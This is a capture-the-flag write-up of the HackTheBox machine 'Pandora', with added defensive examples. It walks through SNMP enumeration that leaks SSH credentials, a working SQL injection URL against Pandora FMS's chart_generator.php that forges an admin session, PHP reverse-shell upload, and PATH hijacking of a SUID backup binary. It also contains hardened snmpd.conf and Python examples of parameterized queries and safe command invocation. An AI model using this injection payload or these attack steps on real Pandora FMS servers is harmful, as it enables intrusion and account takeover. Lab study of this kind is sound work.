HackTheBox - Machines - Pandora.
Target: 10.10.11.136   Attack machine: 10.10.14.24
1. Information gathering
First an Nmap port scan of the target shows that ports 22 (SSH) and 80 (web) are open, so let's start with the web page and see whether there is any information or anything exploitable.
Command: nmap -sS -sV -sC -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds
When I did this box the first time I had already mapped the IP to pandora.htb, and because that old entry was still in place, this time the site opened directly.
The first time through Pandora, just write the domain-name mapping into the hosts file.
The web page itself had nothing useful, so let's scan for directories.
The directories turned up nothing usable either, but since this is a lab box there has to be a way in.
Scan the UDP ports with nmap as well.
You can see my own IP address in the snmp-netstat output here; that is because by the time the UDP scan ran I had already established a connection to the target's SNMP service.
Command: nmap -sS -sU -sC -sV -O -T4 10.10.11.136

Nmap scan report for 10.10.11.136
Host is up (0.32s latency).
Not shown: 998 closed tcp ports (reset), 994 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT      STATE         SERVICE        VERSION
22/tcp    open          ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp    open          http           Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
22/udp    open|filtered ssh
161/udp   open          snmp           SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
|   1:
|   2:
|   3:
|   4:
|   6:
|   9:
|   10:
|   11:
|   12:
|   13:
|   14:
|   15:
|   16:
|   17:
|   18:
|   20:
|   21:
|   22:
|   23:
|   24:
|   25:
|   26:
|   27:
|   28:
|   29:
|   30:
|   77:
|   78:
|   79:
|   80:
|   81:
|   82:
|   83:
|   84:
|   85:
|_  88:
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 14.25 Mb sent, 14.25 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:c8:18 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 18.62 Mb sent, 16.92 Mb received
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 13h44m13.92s (4945392 timeticks)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 13h44m14s
| snmp-netstat:
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:22      10.10.14.24:1079
|   TCP  10.10.11.136:22      10.10.14.24:1081
|   TCP  10.10.11.136:48448   10.10.14.2:4321
|   TCP  10.10.11.136:48756   10.10.14.2:4321
|   TCP  10.10.11.136:54026   10.10.14.2:4321
|   TCP  10.10.11.136:54808   1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
1885/udp  open|filtered vrtstrapserver
16970/udp open|filtered unknown
20872/udp open|filtered unknown
37813/udp open|filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/10%OT=22%CT=1%CU=2%PV=Y%DS=2%DC=I%G=Y%TM=6204DB45%P=
OS:i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O
OS:3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M508NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: pandora; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1124.37 seconds
Once the scan finishes you can see that SNMP (Simple Network Management Protocol) is running on UDP port 161.
We can try querying it with snmpwalk, which can be downloaded from the net-snmp website.
2. Exploitation
Connection command: snmpwalk.exe -v 2c -c public 10.10.11.136
OID list: http://www.ttlsa.com/monitor/snmp-oid/
There is a lot of information in the output, including the hostname, the number of network interfaces, CPU usage and so on.
One of the OIDs corresponds to the following information:
It looks like a username and password. The target has the SSH port open, so test an SSH login with these credentials.
username: daniel, password: HotelBabylon23
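From the defending side, what makes the snmpwalk above so productive is a read-only community string of public that answers for the whole MIB tree. The fragment below is an added example in net-snmp's snmpd.conf syntax, not configuration taken from the write-up or from the target: it restricts the public community to the system and hrSystem subtrees (which is how Ubuntu ships its default snmpd.conf) and binds the agent to localhost unless remote polling is actually needed.

```conf
# Listen on the loopback interface only; remove this line only if a
# remote poller genuinely needs to reach the agent.
agentaddress 127.0.0.1,[::1]

# A view that covers only the system group (sysDescr, sysName, ...)
# and the hrSystem group (uptime, date).
view   systemonly  included   .1.3.6.1.2.1.1
view   systemonly  included   .1.3.6.1.2.1.25.1

# The read-only community is pinned to that view. Everything outside it,
# including hrSWRun (.1.3.6.1.2.1.25.4), where process names and
# command-line arguments are reported, is not answered for this community.
rocommunity  public  default  -V systemonly
rocommunity6 public  default  -V systemonly
```

With this in place a walk with `-c public` returns only the system and hrSystem objects; anything that needs the full tree should use an SNMPv3 user with authentication rather than a widened v2c community.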
C:\Users\kami>ssh daniel@10.10.11.136
daniel@10.10.11.136's password:
Permission denied, please try again.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 10 Feb 09:47:53 UTC 2022

  System load:           0.08
  Usage of /:            63.1% of 4.87GB
  Memory usage:          9%
  Swap usage:            0%
  Processes:             256
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Feb 9 19:49:10 2022 from 10.10.14.2
daniel@pandora:~$ whoami
daniel
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$
3. Privilege escalation, in progress
There is also a matt account, and the user.txt in that account's home should be the flag, but we have no permission to read it, so the next step is to find a way to escalate to matt.
I tried SUID, sudo and cron-job based privilege escalation; none of them seemed to work.
Let's curl the box itself and see what comes back.
Append the path to the URL and open it to see what it is. For clarity, I modified my hosts file so that the IP maps to pandora.htb.
It says not found, but when I curl pandora.htb on the box itself I can clearly see it.
Time for an SSH tunnel.
C:\Users\kami>ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 10 Feb 10:04:59 UTC 2022

  System load:           0.0
  Usage of /:            63.1% of 4.87GB
  Memory usage:          15%
  Swap usage:            0%
  Processes:             249
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:c818

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Feb 10 09:47:54 2022 from 10.10.14.24
The tunnel is now up, and opening 127.0.0.1 in the browser reaches the web service that only listens locally on the target.
The page title is Pandora FMS, and the footer shows the version as v7.0NG.742_FIX_PERL2020.
I found the matching CVE on https://cvedetails.com: a SQL injection.
The injection point is the session_id parameter of pandora_console/include/chart_generator.php, so throw it straight into sqlmap.
It produced the database name, then the table names, and finally the session values.
Tables (178):
taddress, taddress_agent, tagent_access, tagent_custom_data, tagent_custom_fields, tagent_custom_fields_filter, tagent_module_inventory, tagent_module_log, tagent_repository, tagent_secondary_group,
tagente, tagente_datos, tagente_datos_inc, tagente_datos_inventory, tagente_datos_log4x, tagente_datos_string, tagente_estado, tagente_modulo,
talert_actions, talert_commands, talert_snmp, talert_snmp_action, talert_special_days, talert_template_module_actions, talert_template_modules, talert_templates, tattachment,
tautoconfig, tautoconfig_actions, tautoconfig_rules, tcategory, tcluster, tcluster_agent, tcluster_item, tcollection, tconfig, tconfig_os, tcontainer, tcontainer_item, tcredential_store,
tdashboard, tdatabase, tdeployment_hosts, tevent_alert, tevent_alert_action, tevent_custom_field, tevent_extended, tevent_filter, tevent_response, tevent_rule, tevento,
textension_translate_string, tfiles_repo, tfiles_repo_group, tgis_data_history, tgis_data_status, tgis_map, tgis_map_connection, tgis_map_has_tgis_map_con, tgis_map_layer, tgis_map_layer_groups, tgis_map_layer_has_tagente,
tgraph, tgraph_source, tgraph_source_template, tgraph_template, tgroup_stat, tgrupo, tincidencia, titem, tlanguage, tlayout, tlayout_data, tlayout_template, tlayout_template_data, tlink, tlocal_component, tlog_graph_models,
tmap, tmensajes, tmetaconsole_agent, tmetaconsole_agent_secondary_group, tmetaconsole_event, tmetaconsole_event_history, tmetaconsole_setup, tmigration_module_queue, tmigration_queue,
tmodule, tmodule_group, tmodule_inventory, tmodule_relationship, tmodule_synth, tnetflow_filter, tnetflow_report, tnetflow_report_content,
tnetwork_component, tnetwork_component_group, tnetwork_map, tnetwork_matrix, tnetwork_profile, tnetwork_profile_component, tnetworkmap_ent_rel_nodes, tnetworkmap_enterprise, tnetworkmap_enterprise_nodes,
tnews, tnota, tnotification_group, tnotification_source, tnotification_source_group, tnotification_source_group_user, tnotification_source_user, tnotification_user, torigen,
tpassword_history, tperfil, tphase, tplanned_downtime, tplanned_downtime_agents, tplanned_downtime_modules, tplugin,
tpolicies, tpolicy_agents, tpolicy_alerts, tpolicy_alerts_actions, tpolicy_collections, tpolicy_groups, tpolicy_modules, tpolicy_modules_inventory, tpolicy_plugins, tpolicy_queue,
tprofile_view, tprovisioning, tprovisioning_rules, trecon_script, trecon_task, trel_item, tremote_command, tremote_command_target,
treport, treport_content, treport_content_item, treport_content_item_temp, treport_content_sla_com_temp, treport_content_sla_combined, treport_content_template, treport_custom_sql, treport_template, treset_pass, treset_pass_history,
tserver, tserver_export, tserver_export_data, tservice, tservice_element, tsesion, tsesion_extended, tsessions_php, tskin, tsnmp_filter,
ttag, ttag_module, ttag_policy_module, ttipo_modulo, ttransaction, ttrap, ttrap_custom_values, tupdate, tupdate_journal, tupdate_package, tupdate_settings,
tuser_double_auth, tuser_task, tuser_task_scheduled, tusuario, tusuario_perfil, tvisual_console_elements_cache, twidget, twidget_dashboard

178 tables in total, but only three of them relate to sessions. After testing, I chose to dump the tsessions_php table.
+----------------------------+------------------------------------------------------+------------+
| id_session                 | data                                                 | last_active |
+----------------------------+------------------------------------------------------+------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                             | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                 | 1638789018 |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                 | 1638792211 |
| 226i87if97nt5hlqp51e9n8rrk | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;  | 1644436354 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                 | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                             | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                 | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                 | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                             | 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL                                                 | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                 | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                             | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                             | 1641195617 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                 | 1623957150 |
| 883c23eu7d1ndarij0qtg3kd12 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644437290 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                             | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                 | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                             | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                 | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                             | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                 | 1638787213 |
| cs89puvbasun981denejfp64r2 | id_usuario|s:6:"daniel";                             | 1644488590 |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                 | 1638786277 |
| eng03tpqsi5243hajufjtmbdh3 | NULL                                                 | 1644488794 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                             | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                 | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                 | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                             | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;  | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                 | 1638786349 |
| gnniv81mf01km3js0874s9ktd3 | NULL                                                 | 1644437818 |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                 | 1638540345 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                             | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                             | 1638456173 |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                 | 1638787808 |
| l33ouea0ibftaucjbdnv3spgfs | NULL                                                 | 1644488696 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                 | 1638796348 |
| ng1n291iilod73mebktb2vfu29 | id_usuario|s:6:"daniel";                             | 1644436001 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                             | 1638540482 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                             | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                             | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                 | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                 | 1638787677 |
| r6greufnpiikl6i06q7lcjgmnd | NULL                                                 | 1644448880 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                             | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                             | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                             | 1638793297 |
| vdoohnc7hlr1fglc7gamjqljrk | NULL                                                 | 1644488427 |
+----------------------------+------------------------------------------------------+------------+
You can see that sessions for daniel, admin and matt are all recorded there.
Using the PoC: http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp
Then open the backend at http://127.0.0.1/pandora_console/ and you are logged in.
But while I was working on this someone else was on the box too and had overwritten the backend page with a command-execution webshell page, so all I could do was run commands directly.
Use python3 to send a reverse shell back.
Got the flag.
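The dumped tsessions_php rows and the session_id injection are easiest to reason about side by side. The Python below is an added example, not code from the write-up or from Pandora FMS: it models the session lookup with an in-memory sqlite3 table using the column names from the dump (the column order and the shape of the query are assumptions), contrasts a string-concatenated WHERE clause with a parameterized one using the write-up's own PoC value as input, and decodes the data column's PHP session serialization ("name|value" pairs as written by PHP's default session handler) into Python values. The session ids and timestamps in the sample rows are constructed.

```python
"""Added example; not code from the write-up or from Pandora FMS. Models the
tsessions_php lookup behind the chart_generator.php session_id parameter with
an in-memory sqlite3 table (column order and query shape are assumptions)."""
import sqlite3

# Constructed sample rows modelled on the dump; ids and timestamps are made up,
# the data strings use the same serialization as the real dump.
SAMPLE_ROWS = [
    ("sess-daniel-0001", 1638783555, 'id_usuario|s:6:"daniel";'),
    ("sess-anon-0002", 1638789018, None),
    ("sess-matt-0003", 1644436354, 'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;'),
]

# The session_id value from the write-up's PoC, used here as the hostile input.
POC_SESSION_ID = "' union SELECT 1,2,'id_usuario|s:5:\"admin\";' as data -- exp"


def make_db():
    """In-memory stand-in for tsessions_php: id_session, last_active, data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tsessions_php "
                 "(id_session TEXT PRIMARY KEY, last_active INTEGER, data TEXT)")
    conn.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def _parse_value(s, pos):
    """Parse one PHP-serialized value at s[pos]; return (value, offset after it).
    Covers s (string), i, d, b, N and a (array). String lengths are treated as
    character counts, which is exact for the ASCII data seen in the dump."""
    t = s[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in ("i", "b", "d"):                       # i:12;  b:0;  d:1.5;
        end = s.index(";", pos)
        raw = s[pos + 2:end]
        val = float(raw) if t == "d" else int(raw)
        return (bool(val) if t == "b" else val), end + 1
    if t == "s":                                   # s:<len>:"<text>";
        colon = s.index(":", pos + 2)
        length = int(s[pos + 2:colon])
        start = colon + 2                          # skip :"
        return s[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:<n>:{<key><value>...}
        colon = s.index(":", pos + 2)
        count = int(s[pos + 2:colon])
        p = colon + 2                              # skip :{
        out = {}
        for _ in range(count):
            key, p = _parse_value(s, p)
            out[key], p = _parse_value(s, p)
        return out, p + 1                          # skip }
    raise ValueError("unsupported PHP type %r at offset %d" % (t, pos))


def parse_php_session(data):
    """Decode a PHP session record: repeated <name>|<serialized value>."""
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        name = data[pos:bar]
        result[name], pos = _parse_value(data, bar + 1)
    return result


def load_session_vulnerable(conn, session_id):
    """The defect: session_id is spliced into the SQL text. A leading quote
    closes the literal and the rest of the input runs as SQL; the PoC's UNION
    supplies a row whose data column is chosen by the client."""
    sql = ("SELECT id_session, last_active, data FROM tsessions_php "
           "WHERE id_session = '" + session_id + "'")
    row = conn.execute(sql).fetchone()
    return parse_php_session(row[2]) if row and row[2] else None


def load_session(conn, session_id):
    """The fix: a bound parameter. The quote and the UNION stay inside the value
    being compared, so the PoC input simply matches no session."""
    row = conn.execute("SELECT data FROM tsessions_php WHERE id_session = ?",
                       (session_id,)).fetchone()
    return parse_php_session(row[0]) if row and row[0] else None


if __name__ == "__main__":
    db = make_db()
    print("legit matt session :", load_session(db, "sess-matt-0003"))
    print("PoC, concatenated  :", load_session_vulnerable(db, POC_SESSION_ID))
    print("PoC, parameterized :", load_session(db, POC_SESSION_ID))
```

The concatenated version hands back a session for admin that was never written to the table, which is exactly why the backend accepts the forged session_id; the parameterized version returns nothing for the same input. The parser is the same one a defender would use to audit what a session store actually holds, for instance to spot rows whose id_usuario is a privileged account.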
4. Privilege escalation to root
First look for files with the SUID bit set; there is a binary called pandora_backup.
Running it errors out. Ignore that for now and first generate an SSH key pair so we can log in over SSH.
Generate the SSH key and log in directly as matt.
After generating it, create an id_rsa locally, also with permission 700, and paste the generated key into it.
Then connect over SSH.
Once the SSH connection is up, start forging the malicious file.
Create a fake tar, inject matt's home directory into the environment variable (PATH), then run pandora_backup.
This box was genuinely hard for me, to the point that I searched the whole web for writeups…
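The mechanism behind those two steps, and its fix, as an added example that is not from the write-up or from the pandora_backup binary: a program that runs tar by bare name resolves it through the caller's PATH, so whichever tar-named file comes first on a caller-controlled PATH is what executes. The hardened variant calls the tool by absolute path with a fixed environment. The script builds two throwaway directories with constructed tar stubs (each only prints its own label); directory names and stub behaviour are made up for the demo.

```python
"""Added example; not from the write-up or from pandora_backup. Shows why a
SUID helper must never run 'tar' by bare name with an inherited PATH, and
what the hardened call looks like. All files are built in a temp directory."""
import os
import shutil
import subprocess
import tempfile

# Constructed stub: stands in for a real or fake tar and only prints a label.
STUB = "#!/bin/sh\necho {label}\n"


def make_demo_dirs():
    """Build <tmp>/trusted/tar and <tmp>/untrusted/tar; return both dirs."""
    base = tempfile.mkdtemp(prefix="pathdemo-")
    dirs = {}
    for label in ("trusted", "untrusted"):
        d = os.path.join(base, label)
        os.mkdir(d)
        stub = os.path.join(d, "tar")
        with open(stub, "w") as fh:
            fh.write(STUB.format(label=label))
        os.chmod(stub, 0o755)
        dirs[label] = d
    return dirs


def resolve_tar(path_value):
    """Which file a bare 'tar' resolves to under the given PATH value."""
    return shutil.which("tar", path=path_value)


def backup_unsafe(path_value):
    """Bare command name, caller-supplied PATH: the first match on PATH wins."""
    done = subprocess.run(["tar"], env={"PATH": path_value},
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()


def backup_hardened(tar_path):
    """Absolute path plus a fixed, minimal environment: the caller's PATH is
    never consulted. Real code would hardcode e.g. /usr/bin/tar here."""
    done = subprocess.run([tar_path], env={"PATH": "/usr/bin:/bin"},
                          capture_output=True, text=True, check=True)
    return done.stdout.strip()


def demo():
    """Run both variants with the untrusted dir first on PATH; return the labels."""
    dirs = make_demo_dirs()
    hijacked_path = dirs["untrusted"] + os.pathsep + dirs["trusted"]
    try:
        return {
            "resolved": os.path.basename(os.path.dirname(resolve_tar(hijacked_path))),
            "unsafe": backup_unsafe(hijacked_path),
            "hardened": backup_hardened(os.path.join(dirs["trusted"], "tar")),
        }
    finally:
        shutil.rmtree(os.path.dirname(dirs["trusted"]))


if __name__ == "__main__":
    print(demo())  # {'resolved': 'untrusted', 'unsafe': 'untrusted', 'hardened': 'trusted'}
```

The same two rules apply to any privileged helper, SUID binary or sudo rule: name tools by absolute path and start from a clean environment rather than the invoking user's. sudo's secure_path setting exists for exactly this reason.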
5. Supplement: getting into the backend
Using the PoC: http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- exp
Then open the backend at http://127.0.0.1/pandora_console/ and you are logged in.
Then, under Admin tools, find the File manager.
Click upload and upload a PHP reverse shell; then simply browse to it and the shell comes back.
After the upload the file lives under pandora_console/images/.
Start an nc listener locally and visit http://127.0.0.1/pandora_console/images/1.php
and the connection comes back.
References:
https://zhuanlan.zhihu.com/p/458926451
https://blog.peterjbrowning.com/2022/01/htb-writeup-pandora